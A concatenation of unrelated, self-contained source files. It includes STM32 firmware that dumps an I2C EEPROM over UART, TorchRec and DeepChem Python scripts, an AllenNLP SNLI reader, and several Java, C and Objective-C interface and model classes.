/** ****************************************************************************** * @file : main.c * @brief : Main program body ****************************************************************************** ** This notice applies to any and all portions of this file * that are not between comment pairs USER CODE BEGIN and * USER CODE END. Other portions of this file, whether * inserted by the user or by software development tools * are owned by their respective copyright owners. * * COPYRIGHT(c) 2021 STMicroelectronics * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ /* Includes ------------------------------------------------------------------*/ #include "main.h" #include "stm32f0xx_hal.h" /* USER CODE BEGIN Includes */ #include <stdio.h> #include <string.h> #include "helpers.h" #include "shared.h" /* USER CODE END Includes */ /* Private variables ---------------------------------------------------------*/ I2C_HandleTypeDef hi2c1; UART_HandleTypeDef huart2; /* USER CODE BEGIN PV */ /* Private variables ---------------------------------------------------------*/ /* USER CODE END PV */ /* Private function prototypes -----------------------------------------------*/ void SystemClock_Config(void); static void MX_GPIO_Init(void); static void MX_USART2_UART_Init(void); static void MX_I2C1_Init(void); /* USER CODE BEGIN PFP */ /* Private function prototypes -----------------------------------------------*/ /* USER CODE END PFP */ /* USER CODE BEGIN 0 */ int fputc(int ch, FILE *f) { HAL_UART_Transmit(&huart2, (unsigned char *)&ch, 1, 100); return ch; } void HAL_UART_RxCpltCallback(UART_HandleTypeDef *huart) { //linear_buf_add(&uart_lb, uart_byte_buf[0]); // printf("%c", uart_byte_buf[0]); } /* USER CODE END 0 */ /** * @brief The application entry point. * * @retval None */ int main(void) { /* USER CODE BEGIN 1 */ /* USER CODE END 1 */ /* MCU Configuration----------------------------------------------------------*/ /* Reset of all peripherals, Initializes the Flash interface and the Systick. */ HAL_Init(); /* USER CODE BEGIN Init */ /* USER CODE END Init */ /* Configure the system clock */ SystemClock_Config(); /* USER CODE BEGIN SysInit */ /* USER CODE END SysInit */ /* Initialize all configured peripherals */ MX_GPIO_Init(); MX_USART2_UART_Init(); MX_I2C1_Init(); /* USER CODE BEGIN 2 */ HAL_Delay(500); printf("bobhack\n"); while (1) { printf("Scanning I2C bus...\n"); uint8_t scan_result = HAL_I2C_IsDeviceReady(&hi2c1, EEPROM_READ_ADDR, 1, 50); if(scan_result != 0) printf("EEPROM not found, retrying...\n"); else break; HAL_Delay(500); } printf("Bob cassette found!\n"); HAL_Delay(500); /* USER CODE END 2 */ /* Infinite loop */ /* USER CODE BEGIN WHILE */ for (int i = 0; i < EEPROM_SIZE; i++) { uint8_t this_byte = eeprom_read(i); printf("bobdump %d %d\n", i, this_byte); } printf("done!\n"); while (1) { HAL_GPIO_TogglePin(USER_LED_GPIO_Port, USER_LED_Pin); HAL_Delay(500); /* USER CODE END WHILE */ /* USER CODE BEGIN 3 */ } /* USER CODE END 3 */ } /** * @brief System Clock Configuration * @retval None */ void SystemClock_Config(void) { RCC_OscInitTypeDef RCC_OscInitStruct; RCC_ClkInitTypeDef RCC_ClkInitStruct; RCC_PeriphCLKInitTypeDef PeriphClkInit; /**Initializes the CPU, AHB and APB busses clocks */ RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSI|RCC_OSCILLATORTYPE_HSI48; RCC_OscInitStruct.HSIState = RCC_HSI_ON; RCC_OscInitStruct.HSI48State = RCC_HSI48_ON; RCC_OscInitStruct.HSICalibrationValue = 16; RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; if (HAL_RCC_OscConfig(&RCC_OscInitStruct) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } /**Initializes the CPU, AHB and APB busses clocks */ RCC_ClkInitStruct.ClockType = RCC_CLOCKTYPE_HCLK|RCC_CLOCKTYPE_SYSCLK |RCC_CLOCKTYPE_PCLK1; RCC_ClkInitStruct.SYSCLKSource = RCC_SYSCLKSOURCE_HSI48; RCC_ClkInitStruct.AHBCLKDivider = RCC_SYSCLK_DIV1; RCC_ClkInitStruct.APB1CLKDivider = RCC_HCLK_DIV1; if (HAL_RCC_ClockConfig(&RCC_ClkInitStruct, FLASH_LATENCY_1) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } PeriphClkInit.PeriphClockSelection = RCC_PERIPHCLK_I2C1; PeriphClkInit.I2c1ClockSelection = RCC_I2C1CLKSOURCE_HSI; if (HAL_RCCEx_PeriphCLKConfig(&PeriphClkInit) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } /**Configure the Systick interrupt time */ HAL_SYSTICK_Config(HAL_RCC_GetHCLKFreq()/1000); /**Configure the Systick */ HAL_SYSTICK_CLKSourceConfig(SYSTICK_CLKSOURCE_HCLK); /* SysTick_IRQn interrupt configuration */ HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0); } /* I2C1 init function */ static void MX_I2C1_Init(void) { hi2c1.Instance = I2C1; hi2c1.Init.Timing = 0x2000090E; hi2c1.Init.OwnAddress1 = 0; hi2c1.Init.AddressingMode = I2C_ADDRESSINGMODE_7BIT; hi2c1.Init.DualAddressMode = I2C_DUALADDRESS_DISABLE; hi2c1.Init.OwnAddress2 = 0; hi2c1.Init.OwnAddress2Masks = I2C_OA2_NOMASK; hi2c1.Init.GeneralCallMode = I2C_GENERALCALL_DISABLE; hi2c1.Init.NoStretchMode = I2C_NOSTRETCH_DISABLE; if (HAL_I2C_Init(&hi2c1) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } /**Configure Analogue filter */ if (HAL_I2CEx_ConfigAnalogFilter(&hi2c1, I2C_ANALOGFILTER_ENABLE) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } /**Configure Digital filter */ if (HAL_I2CEx_ConfigDigitalFilter(&hi2c1, 0) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } } /* USART2 init function */ static void MX_USART2_UART_Init(void) { huart2.Instance = USART2; huart2.Init.BaudRate = 115200; huart2.Init.WordLength = UART_WORDLENGTH_8B; huart2.Init.StopBits = UART_STOPBITS_1; huart2.Init.Parity = UART_PARITY_NONE; huart2.Init.Mode = UART_MODE_TX_RX; huart2.Init.HwFlowCtl = UART_HWCONTROL_NONE; huart2.Init.OverSampling = UART_OVERSAMPLING_16; huart2.Init.OneBitSampling = UART_ONE_BIT_SAMPLE_DISABLE; huart2.AdvancedInit.AdvFeatureInit = UART_ADVFEATURE_NO_INIT; if (HAL_UART_Init(&huart2) != HAL_OK) { _Error_Handler(__FILE__, __LINE__); } } /** Configure pins as * Analog * Input * Output * EVENT_OUT * EXTI */ static void MX_GPIO_Init(void) { GPIO_InitTypeDef GPIO_InitStruct; /* GPIO Ports Clock Enable */ __HAL_RCC_GPIOB_CLK_ENABLE(); __HAL_RCC_GPIOF_CLK_ENABLE(); __HAL_RCC_GPIOA_CLK_ENABLE(); /*Configure GPIO pin Output Level */ HAL_GPIO_WritePin(USER_LED_GPIO_Port, USER_LED_Pin, GPIO_PIN_SET); /*Configure GPIO pin : USER_BUTTON_Pin */ GPIO_InitStruct.Pin = USER_BUTTON_Pin; GPIO_InitStruct.Mode = GPIO_MODE_INPUT; GPIO_InitStruct.Pull = GPIO_NOPULL; HAL_GPIO_Init(USER_BUTTON_GPIO_Port, &GPIO_InitStruct); /*Configure GPIO pin : USER_LED_Pin */ GPIO_InitStruct.Pin = USER_LED_Pin; GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP; GPIO_InitStruct.Pull = GPIO_NOPULL; GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW; HAL_GPIO_Init(USER_LED_GPIO_Port, &GPIO_InitStruct); } /* USER CODE BEGIN 4 */ /* USER CODE END 4 */ /** * @brief This function is executed in case of error occurrence. * @param file: The file name as string. * @param line: The line in file as a number. * @retval None */ void _Error_Handler(char *file, int line) { /* USER CODE BEGIN Error_Handler_Debug */ /* User can add his own implementation to report the HAL error return state */ while(1) { } /* USER CODE END Error_Handler_Debug */ } #ifdef USE_FULL_ASSERT /** * @brief Reports the name of the source file and the source line number * where the assert_param error has occurred. * @param file: pointer to the source file name * @param line: assert_param error line source number * @retval None */ void assert_failed(uint8_t* file, uint32_t line) { /* USER CODE BEGIN 6 */ /* User can add his own implementation to report the file name and line number, tex: printf("Wrong parameters value: file %s on line %d\r\n", file, line) */ /* USER CODE END 6 */ } #endif /* USE_FULL_ASSERT */ /** * @} */ /** * @} */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
3,783
392
<reponame>nicktrienensfuzz/Kingfisher #import <Foundation/Foundation.h> @interface ASIHTTPRequestStub : NSObject - (int)stub_responseStatusCode; - (NSData *)stub_responseData; - (NSDictionary *)stub_responseHeaders; - (void)stub_startRequest; @end
93
814
<reponame>xing-liu/torchrec #!/usr/bin/env python3 # Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. from typing import Dict, List, Optional, Tuple import torch from torchrec.metrics.rec_metric import RecTaskInfo def is_empty_signals( labels: torch.Tensor, predictions: torch.Tensor, weights: torch.Tensor, ) -> bool: return ( torch.numel(labels) <= 0 and torch.numel(predictions) <= 0 and torch.numel(weights) <= 0 ) def parse_model_outputs( label_name: str, prediction_name: str, weight_name: str, model_out: Dict[str, torch.Tensor], ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[torch.Tensor]]: labels = model_out[label_name].squeeze() if not prediction_name: assert not weight_name, "weight name must be empty if prediction name is empty" return (labels, None, None) assert isinstance(labels, torch.Tensor) predictions = model_out[prediction_name].squeeze() assert isinstance(predictions, torch.Tensor) weights = model_out[weight_name].squeeze() assert isinstance(weights, torch.Tensor) # If the model output for the metric is empty, pass it forward if not ( (torch.numel(labels) == torch.numel(predictions)) and (torch.numel(labels) == torch.numel(weights)) ): assert is_empty_signals(labels, predictions, weights) if not is_empty_signals(labels, predictions, weights): assert (torch.numel(labels) == torch.numel(predictions)) and ( torch.numel(labels) == torch.numel(weights) ), ( "Expect the same number of elements in labels, predictions, and weights. " f"Instead got {torch.numel(labels)}, {torch.numel(predictions)}, " f"{torch.numel(weights)}" ) # non-empty tensors need to have rank 1 if len(labels.size()) == 0: labels = labels.unsqueeze(0) predictions = predictions.unsqueeze(0) weights = weights.unsqueeze(0) return labels, predictions, weights def parse_task_model_outputs( tasks: List[RecTaskInfo], model_out: Dict[str, torch.Tensor] ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor], Dict[str, torch.Tensor]]: all_labels: Dict[str, torch.Tensor] = {} all_predictions: Dict[str, torch.Tensor] = {} all_weights: Dict[str, torch.Tensor] = {} for task in tasks: labels, predictions, weights = parse_model_outputs( task.label_name, task.prediction_name, task.weight_name, model_out ) if predictions is not None and weights is not None: if not is_empty_signals(labels, predictions, weights): all_labels[task.name] = labels all_predictions[task.name] = predictions all_weights[task.name] = weights else: if torch.numel(labels) > 0: all_labels[task.name] = labels return all_labels, all_predictions, all_weights
1,298
3,782
<filename>examples/sweetlead/sweet.py<gh_stars>1000+ """ Script that loads random forest models trained on the sider and tox21 datasets, predicts on sweetlead, creates covariance matrix @Author <NAME> """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals import os import sys import numpy as np import pandas as pd import deepchem as dc from sklearn.ensemble import RandomForestClassifier from deepchem.models.multitask import SingletaskToMultitask from deepchem import metrics from deepchem.metrics import Metric from deepchem.models.sklearn_models import SklearnModel tox_tasks, (tox_train, tox_valid, tox_test), tox_transformers = dc.molnet.load_tox21() classification_metric = Metric( metrics.roc_auc_score, np.mean, mode="classification") def model_builder(model_dir): sklearn_model = RandomForestClassifier( class_weight="balanced", n_estimators=500, n_jobs=-1) return dc.models.SklearnModel(sklearn_model, model_dir) print(tox_train.get_task_names()) print(tox_tasks) tox_model = SingletaskToMultitask(tox_tasks, model_builder) tox_model.fit(tox_train) # Load sider models now sider_tasks, ( sider_train, sider_valid, sider_test), sider_transformers = dc.molnet.load_sider(split="random") sider_model = SingletaskToMultitask(sider_tasks, model_builder) sider_model.fit(sider_train) # Load sweetlead dataset now. Pass in dataset object and appropriate # transformers to predict functions sweet_tasks, (sweet_dataset, _, _), sweet_transformers = dc.molnet.load_sweet() sider_predictions = sider_model.predict(sweet_dataset, sweet_transformers) tox_predictions = tox_model.predict(sweet_dataset, sweet_transformers) sider_dimensions = sider_predictions.shape[1] tox_dimensions = tox_predictions.shape[1] confusion_matrix = np.zeros(shape=(tox_dimensions, sider_dimensions)) for i in range(tox_predictions.shape[0]): nonzero_tox = np.nonzero(tox_predictions[i, :]) nonzero_sider = np.nonzero(sider_predictions[i, :]) for j in nonzero_tox[0]: for k in nonzero_sider[0]: confusion_matrix[j, k] += 1 df = pd.DataFrame(confusion_matrix) df.to_csv("./tox_sider_matrix.csv")
796
831
/* * Copyright (C) 2016 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.android.tools.idea.explorer; import com.android.annotations.concurrency.UiThread; import com.android.tools.idea.explorer.fs.DeviceFileSystem; import org.jetbrains.annotations.NotNull; import java.util.List; @UiThread public interface DeviceExplorerViewListener { void noDeviceSelected(); void deviceSelected(@NotNull DeviceFileSystem device); void treeNodeExpanding(@NotNull DeviceFileEntryNode treeNode); void openNodesInEditorInvoked(@NotNull List<DeviceFileEntryNode> treeNodes); void saveNodesAsInvoked(@NotNull List<DeviceFileEntryNode> treeNodes); void copyNodePathsInvoked(@NotNull List<DeviceFileEntryNode> treeNodes); void newDirectoryInvoked(@NotNull DeviceFileEntryNode parentTreeNode); void newFileInvoked(@NotNull DeviceFileEntryNode parentTreeNode); void deleteNodesInvoked(@NotNull List<DeviceFileEntryNode> nodes); void synchronizeNodesInvoked(@NotNull List<DeviceFileEntryNode> nodes); void uploadFilesInvoked(@NotNull DeviceFileEntryNode treeNode); }
463
301
//****************************************************************** // // Copyright 2015 Samsung Electronics All Rights Reserved. // //-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // //-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #ifndef EASYSETUP_ENROLLEE_H__ #define EASYSETUP_ENROLLEE_H__ #include "escommon.h" #include "ESEnrolleeCommon.h" /** * @file * * This file contains Enrollee APIs */ #ifdef __cplusplus extern "C" { #endif // __cplusplus /** * A function pointer for registering a user-defined function to set user-specific properties to a * response going back to a client. * @param payload Represents a response. You can set a specific value with specific property key * to the payload. If a client receives the response and know the property key, then it can * extract the value. * @param resourceType Used to distinguish which resource the received property belongs to. */ typedef void (*ESWriteUserdataCb)(OCRepPayload* payload, char* resourceType); /** * A function pointer for registering a user-defined function to parse user-specific properties from * received POST request. * @param payload Represents a received POST request. If you know user-specific property key, * then you can extract a corresponding value if it exists. * @param resourceType Used to distinguish which resource the received property belongs to * @param userdata User-specific data you want to deliver to desired users, i.e. application. * The user should know a data structure of passed userdata. */ typedef void (*ESReadUserdataCb)(OCRepPayload* payload, char* resourceType, void** userdata); /** * This function Initializes the EasySetup. This API must be called prior to invoking any other API * * @param isSecured True if the Enrollee is operating in secured mode. * @param resourceMask Provisining Resource Type which application wants to make. * ES_WIFICONF_RESOURCE = 0x01, * ES_COAPCLOUDCONF_RESOURCE = 0x02, * ES_DEVCONF_RESOURCE = 0x04 * @param callbacks ESProvisioningCallbacks for updating Easy setup Resources' data to the application * @return ::ES_OK on success, some other value upon failure. */ ESResult ESInitEnrollee(bool isSecured, ESResourceMask resourceMask, ESProvisioningCallbacks callbacks); /** * This function Sets Device Information. * * @param deviceProperty Contains device information composed of WiFiConf Structure & DevConf Structure * @return ::ES_OK on success, some other value upon failure. * * @see ESDeviceProperty */ ESResult ESSetDeviceProperty(ESDeviceProperty *deviceProperty); /** * This function Sets Enrollee's State. * * @param esState Contains current enrollee's state. * @return ::ES_OK on success, some other value upon failure. * * @see ESEnrolleeState */ ESResult ESSetState(ESEnrolleeState esState); /** * This function Sets Enrollee's Error Code. * * @param esErrCode Contains enrollee's error code. * @return ::ES_OK on success, some other value upon failure. * * @see ESErrorCode */ ESResult ESSetErrorCode(ESErrorCode esErrCode); /** * This function performs termination of all Easy setup resources. * * @return ::ES_OK on success, some other value upon failure. */ ESResult ESTerminateEnrollee(void); /** * This function is to set two function pointer to handle user-specific properties in in-comming * POST request and to out-going response for GET or POST request. * If you register certain functions with this API, you have to handle OCRepPayload structure to * set and get properties you want. * * @param readCb a callback for parsing properties from POST request * @param writeCb a callback for putting properties to a response to be sent * * @return ::ES_OK on success, some other value upon failure. * * @see ESReadUserdataCb * @see ESWriteUserdataCb */ ESResult ESSetCallbackForUserdata(ESReadUserdataCb readCb, ESWriteUserdataCb writeCb); #ifdef __cplusplus } #endif // __cplusplus #endif /* EASYSETUP_ENROLLEE_H__ */
1,339
1,520
<reponame>tpeng/magnitude from __future__ import with_statement from __future__ import absolute_import #typing import json import logging #overrides from allennlp.common.file_utils import cached_path from allennlp.data.dataset_readers.dataset_reader import DatasetReader from allennlp.data.fields import Field, TextField, LabelField, MetadataField from allennlp.data.instance import Instance from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer from allennlp.data.tokenizers import Tokenizer, WordTokenizer from io import open logger = logging.getLogger(__name__) # pylint: disable=invalid-name class SnliReader(DatasetReader): u""" Reads a file from the Stanford Natural Language Inference (SNLI) dataset. This data is formatted as jsonl, one json-formatted instance per line. The keys in the data are "gold_label", "sentence1", and "sentence2". We convert these keys into fields named "label", "premise" and "hypothesis", along with a metadata field containing the tokenized strings of the premise and hypothesis. Parameters ---------- tokenizer : ``Tokenizer``, optional (default=``WordTokenizer()``) We use this ``Tokenizer`` for both the premise and the hypothesis. See :class:`Tokenizer`. token_indexers : ``Dict[str, TokenIndexer]``, optional (default=``{"tokens": SingleIdTokenIndexer()}``) We similarly use this for both the premise and the hypothesis. See :class:`TokenIndexer`. """ def __init__(self, tokenizer = None, token_indexers = None, lazy = False) : super(SnliReader, self).__init__(lazy) self._tokenizer = tokenizer or WordTokenizer() self._token_indexers = token_indexers or {u'tokens': SingleIdTokenIndexer()} #overrides def _read(self, file_path ): # if `file_path` is a URL, redirect to the cache file_path = cached_path(file_path) with open(file_path, u'r') as snli_file: logger.info(u"Reading SNLI instances from jsonl dataset at: %s", file_path) for line in snli_file: example = json.loads(line) label = example[u"gold_label"] if label == u'-': # These were cases where the annotators disagreed; we'll just skip them. It's # like 800 out of 500k examples in the training data. continue premise = example[u"sentence1"] hypothesis = example[u"sentence2"] yield self.text_to_instance(premise, hypothesis, label) #overrides def text_to_instance(self, # type: ignore premise , hypothesis , label = None) : # pylint: disable=arguments-differ fields = {} premise_tokens = self._tokenizer.tokenize(premise) hypothesis_tokens = self._tokenizer.tokenize(hypothesis) fields[u'premise'] = TextField(premise_tokens, self._token_indexers) fields[u'hypothesis'] = TextField(hypothesis_tokens, self._token_indexers) if label: fields[u'label'] = LabelField(label) metadata = {u"premise_tokens": [x.text for x in premise_tokens], u"hypothesis_tokens": [x.text for x in hypothesis_tokens]} fields[u"metadata"] = MetadataField(metadata) return Instance(fields) SnliReader = DatasetReader.register(u"snli")(SnliReader)
1,539
337
<reponame>qussarah/declare class J { void test() { ChangeReceiverBeforeKt.foo(new X(0), "1", 2); } }
57
362
<reponame>WEBZCC/whois package net.ripe.db.whois.common; import org.apache.commons.lang.StringUtils; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Path; public class InstanceLock { private final static int MAX_INSTANCES = 16; private final static String LOCK_FILE_NAME = "lock"; private final String instanceNamePrefix; private Path lockFile; private String instanceName; public InstanceLock(final String baseDir, final String instanceNamePrefix) { if (StringUtils.isEmpty(baseDir)) { throw new IllegalStateException("Base directory has not been set"); } if (StringUtils.isEmpty(instanceNamePrefix)) { throw new IllegalStateException("Instance name prefix has not been set"); } final Path base = Path.of(baseDir); if (!Files.isDirectory(base)) { throw new IllegalStateException(String.format("Base directory %s does not exist", baseDir)); } this.instanceNamePrefix = instanceNamePrefix; obtain(base); } private void obtain(final Path base) { for (int i = 1; i < MAX_INSTANCES; i++) { try { final String instanceName = this.instanceNamePrefix + i; final Path instanceDir = base.resolve(Path.of(instanceName)); if (!Files.isDirectory(instanceDir)) { Files.createDirectory(instanceDir); } lockFile = instanceDir.resolve(LOCK_FILE_NAME); if (!Files.exists(lockFile)) { Files.createFile(lockFile); this.instanceName = instanceName; return; } } catch (IOException ioe) { lockFile = null; } } throw new IllegalStateException("Could not acquire instance lock file"); } public String getInstanceName() { return instanceName; } public void release() { try { Files.deleteIfExists(lockFile); lockFile = null; instanceName = null; } catch (IOException ioe) { throw new IllegalStateException(String.format("Failed to delete lock file %s", lockFile), ioe); } } }
1,003
3,269
<reponame>Sourav692/FAANG-Interview-Preparation<gh_stars>1000+ # Time: O(m * n) # Space: O(m * n) import collections class Solution(object): def maxEqualRowsAfterFlips(self, matrix): """ :type matrix: List[List[int]] :rtype: int """ count = collections.Counter(tuple(x^row[0] for x in row) for row in matrix) return max(count.itervalues())
218
608
<gh_stars>100-1000 #ifndef ZXING_MULTI_FINDER_PATTERN_FINDER_H #define ZXING_MULTI_FINDER_PATTERN_FINDER_H /* * Copyright 2011 ZXing authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <zxing/qrcode/detector/FinderPattern.h> #include <zxing/qrcode/detector/FinderPatternFinder.h> #include <zxing/qrcode/detector/FinderPatternInfo.h> namespace zxing { namespace multi { class MultiFinderPatternFinder : zxing::qrcode::FinderPatternFinder { private: std::vector<std::vector<Ref<zxing::qrcode::FinderPattern> > > selectBestPatterns(); static const float MAX_MODULE_COUNT_PER_EDGE; static const float MIN_MODULE_COUNT_PER_EDGE; static const float DIFF_MODSIZE_CUTOFF_PERCENT; static const float DIFF_MODSIZE_CUTOFF; public: MultiFinderPatternFinder(Ref<BitMatrix> image, Ref<ResultPointCallback> resultPointCallback); virtual ~MultiFinderPatternFinder(); virtual std::vector<Ref<zxing::qrcode::FinderPatternInfo> > findMulti(DecodeHints const& hints); }; } } #endif // ZXING_MULTI_FINDER_PATTERN_FINDER_H
544
372
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.transcoder.v1beta1.model; /** * Video cropping configuration. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Transcoder API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Crop extends com.google.api.client.json.GenericJson { /** * The number of pixels to crop from the bottom. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer bottomPixels; /** * The number of pixels to crop from the left. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer leftPixels; /** * The number of pixels to crop from the right. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer rightPixels; /** * The number of pixels to crop from the top. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer topPixels; /** * The number of pixels to crop from the bottom. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getBottomPixels() { return bottomPixels; } /** * The number of pixels to crop from the bottom. The default is 0. * @param bottomPixels bottomPixels or {@code null} for none */ public Crop setBottomPixels(java.lang.Integer bottomPixels) { this.bottomPixels = bottomPixels; return this; } /** * The number of pixels to crop from the left. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getLeftPixels() { return leftPixels; } /** * The number of pixels to crop from the left. The default is 0. * @param leftPixels leftPixels or {@code null} for none */ public Crop setLeftPixels(java.lang.Integer leftPixels) { this.leftPixels = leftPixels; return this; } /** * The number of pixels to crop from the right. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getRightPixels() { return rightPixels; } /** * The number of pixels to crop from the right. The default is 0. * @param rightPixels rightPixels or {@code null} for none */ public Crop setRightPixels(java.lang.Integer rightPixels) { this.rightPixels = rightPixels; return this; } /** * The number of pixels to crop from the top. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getTopPixels() { return topPixels; } /** * The number of pixels to crop from the top. The default is 0. * @param topPixels topPixels or {@code null} for none */ public Crop setTopPixels(java.lang.Integer topPixels) { this.topPixels = topPixels; return this; } @Override public Crop set(String fieldName, Object value) { return (Crop) super.set(fieldName, value); } @Override public Crop clone() { return (Crop) super.clone(); } }
1,327
1,299
<reponame>MC-JY/tika /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.tika.parser.microsoft.onenote; import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.Objects; import org.apache.tika.parser.microsoft.onenote.fsshttpb.util.BitConverter; public class ExtendedGUID implements Comparable<ExtendedGUID> { GUID guid; long n; public ExtendedGUID() { } public ExtendedGUID(GUID guid, long n) { this.guid = guid; this.n = n; } public static ExtendedGUID nil() { return new ExtendedGUID(GUID.nil(), 0); } @Override public int compareTo(ExtendedGUID other) { if (other.guid.equals(guid)) { return Long.compare(n, other.n); } return guid.compareTo(other.guid); } @Override public boolean equals(Object o) { if (this == o) { return true; } if (o == null || getClass() != o.getClass()) { return false; } ExtendedGUID that = (ExtendedGUID) o; return n == that.n && Objects.equals(guid, that.guid); } @Override public int hashCode() { return Objects.hash(guid, n); } @Override public String toString() { return String.format(Locale.US, "%s [%d]", guid, n); } public GUID getGuid() { return guid; } public ExtendedGUID setGuid(GUID guid) { this.guid = guid; return this; } public String getExtendedGuidString() { return guid.toString() + " [" + n + "]"; } public long getN() { return n; } public ExtendedGUID setN(long n) { this.n = n; return this; } /** * This method is used to convert the element of ExtendedGUID object into a byte List. * * @return Return the byte list which store the byte information of ExtendedGUID */ public List<Byte> SerializeToByteList() { List<Byte> byteList = new ArrayList<>(guid.toByteArray()); for (byte b : BitConverter.getBytes(n)) { byteList.add(b); } return byteList; } }
1,138
4,772
<gh_stars>1000+ package example.repo; import example.model.Customer1731; import java.util.List; import org.springframework.data.repository.CrudRepository; public interface Customer1731Repository extends CrudRepository<Customer1731, Long> { List<Customer1731> findByLastName(String lastName); }
95
14,668
